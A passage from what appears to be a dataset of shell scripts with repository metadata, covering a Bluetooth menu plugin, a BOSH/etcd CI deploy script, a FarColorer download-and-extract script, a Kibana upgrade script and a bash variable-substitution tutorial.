# bluetooth_id=$(rfkill list | grep Bluetooth | grep hci0 | cut -d: -f1)
for device in $(bluetoothctl paired-devices | cut -d' ' -f3-); do
echo "$device | bash=\"bluetoothctl power on && (bluetoothctl connect $(bluetoothctl paired-devices | grep $device | cut -d' ' -f2) && notify-send 'Connected to $device' || notify-send 'Connection to $device failed') \" refresh=true terminal=false"
done
echo "--"
printmono "$(bluetoothctl show $(bluetoothctl list | grep default | cut -d' ' -f2) | head -n5)"
echo "--"
echo "Power off | bash='bluetoothctl power off' terminal=false refresh=true"
echo "Power on | bash='bluetoothctl power on' terminal=false refresh=true"
fi
| true
|
20d39019d610b43d363b3924bbcb37292140f964
|
Shell
|
cloudfoundry-attic/mega-ci
|
/scripts/ci/deploy-aws-manifests/deploy-etcd-aws-manifests
|
UTF-8
| 1,520
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -exu
ROOT="${PWD}"
release_version="99999+dev.$(date +%s)"
function upload_release() {
local release_path="$1"
pushd "${ROOT}/${release_path}" > /dev/null
/opt/rubies/ruby-2.2.4/bin/bosh -n create release --force --version ${release_version}
/opt/rubies/ruby-2.2.4/bin/bosh -n -t ${BOSH_DIRECTOR} upload release --rebase
popd > /dev/null
}
function deploy_etcd() {
set +ux
source ~/.bashrc
set -ux
mkdir -p "${GOPATH}/src/github.com/cloudfoundry"
pushd "${GOPATH}/src/github.com/cloudfoundry" > /dev/null
ln -s "${ROOT}/mega-ci"
pushd ./mega-ci/scripts/ci/deploy-aws-manifests > /dev/null
set +x
go run main.go \
--manifest-path "${ROOT}/release/${MANIFEST_PATH}" \
--director "${BOSH_DIRECTOR}" \
--user "${BOSH_USER}" \
--password "${BOSH_PASSWORD}" \
--aws-access-key-id "${AWS_ACCESS_KEY_ID}" \
--aws-secret-access-key "${AWS_SECRET_ACCESS_KEY}" \
--aws-region "${AWS_DEFAULT_REGION}"
set -x
popd > /dev/null
popd > /dev/null
}
function main() {
local etcd_release_path="release"
local consul_release_path="consul-release"
upload_release "${consul_release_path}"
upload_release "${etcd_release_path}"
deploy_etcd
}
function teardown() {
set +e
/opt/rubies/ruby-2.2.4/bin/bosh -n -t ${BOSH_DIRECTOR} delete release consul ${release_version}
/opt/rubies/ruby-2.2.4/bin/bosh -n -t ${BOSH_DIRECTOR} delete release etcd ${release_version}
set -e
}
trap teardown EXIT
main
| true
|
857c4d2acb90e2ac82fb31c61ffce70082fb2bf0
|
Shell
|
koji-takahiro/FarManager
|
/misc/nightly/colorer.sh
|
UTF-8
| 1,254
| 3.609375
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
function bcolorer {
BIT=$1
PLUGIN=FarColorer
COLORER_VERSION=$(curl -fsLJ 'https://raw.githubusercontent.com/colorer/FarColorer/master/version4far.txt')
if [ -z "$COLORER_VERSION" ]; then
echo "Failed to get Colorer version"
return 1
fi
echo "Download FarColorer ${COLORER_VERSION}"
COLORER_PLATFORM=$2
COLORER_BASE_NAME=FarColorer.${COLORER_PLATFORM}.v${COLORER_VERSION}
COLORER_FILE_NAME=${COLORER_BASE_NAME}.7z
COLORER_PDB_NAME=${COLORER_BASE_NAME}.pdb.7z
rm -f ${COLORER_FILE_NAME}
rm -f ${COLORER_PDB_NAME}
COLORER_BASE_URL=https://github.com/colorer/FarColorer/releases/download/v${COLORER_VERSION}/
curl -fsLJO ${COLORER_BASE_URL}${COLORER_FILE_NAME}
curl -fsLJO ${COLORER_BASE_URL}${COLORER_PDB_NAME}
if [ ! -e ${COLORER_FILE_NAME} ]; then
echo "Can't find ${COLORER_FILE_NAME}"
return 1
fi
if [ ! -e ${COLORER_PDB_NAME} ]; then
echo "Can't find ${COLORER_PDB_NAME}"
return 1
fi
COLORER_DIR=outfinalnew${BIT}/Plugins/$PLUGIN
mkdir ${COLORER_DIR}
7z x ${COLORER_FILE_NAME} -o${COLORER_DIR}
7z x ${COLORER_PDB_NAME} -o${COLORER_DIR}/bin
rm -f ${COLORER_FILE_NAME}
rm -f ${COLORER_PDB_NAME}
}
( \
bcolorer 32 x86 && \
bcolorer 64 x64 \
) || exit 1
cd ..
| true
|
aafc2c23e8e92f88cb20240b773ca2ad3b69d7b3
|
Shell
|
dc376/it340
|
/nagioslogserver/subcomponents/kibana/upgrade
|
UTF-8
| 795
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/sh -e
pkgname="kibana"
echo "Upgrading Kibana..."
# Delete the old archive
#rm -rf "$pkgname"
# Extract archive
#tar -xzf "$pkgname.tar.gz"
# Copy new files over
(
mkdir -p /var/www/html/nagioslogserver/www
cp -r $pkgname/src/* /var/www/html/nagioslogserver/www
if [ -f /var/www/html/nagioslogserver/www/index.html ];then
mv /var/www/html/nagioslogserver/www/index.html /var/www/html/nagioslogserver/www/index.html_old
fi
)
# Post-upgrade modifications
./post-upgrade
# Do a simple sanity check to make sure some key files exist...
for f in /var/www/html/nagioslogserver/www/config.js ; do
if [ ! -f "$f" ]; then
echo "ERROR: Kibana install appears to have failed - exiting. Missing file = $f"
exit 1
fi
done
# Things are okay
echo "Kibana upgraded OK"
| true
|
a3ddff66ee80bafd376bfcb9258bccdcf5d635ae
|
Shell
|
qjpoo/shellscript
|
/ScriptTutorials/tutorialspoint_UnixTutorial_Scripts/f036_ShellSubstitutions_VariableSubstitution.sh
|
UTF-8
| 917
| 4
| 4
|
[] |
no_license
|
#!/bin/bash
# ${var} Substitue the value of var.
# ${var:-word} If var is null or unset, word is substituted for var. The value of var does not change.
# ${var:=word} If var is null or unset, var is set to the value of word.
# ${var:?message} If var is null or unset, message is printed to standard error. This checks that variables are set correctly.
# ${var:+word} If var is set, word is substituted for var. The value of var does not change.
echo ${var:-"Variable is not set"}
echo "1 - Value of var is ${var}"
echo ${var:="Variable is not set"}
echo "2 - Value of var is ${var}"
unset var
echo ${var:+"This is default value"}
echo "3 - Value of var is $var"
var="Prefix"
echo ${var:+"This is default value"}
echo "4 - Value of var is $var"
echo ${var:?"Print this message"}
echo "5 - Value of var is ${var}"
echo ${var:+""}
unset var
echo "6 - Value of var is ${var}"
echo ${var:?"Print this message"}
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.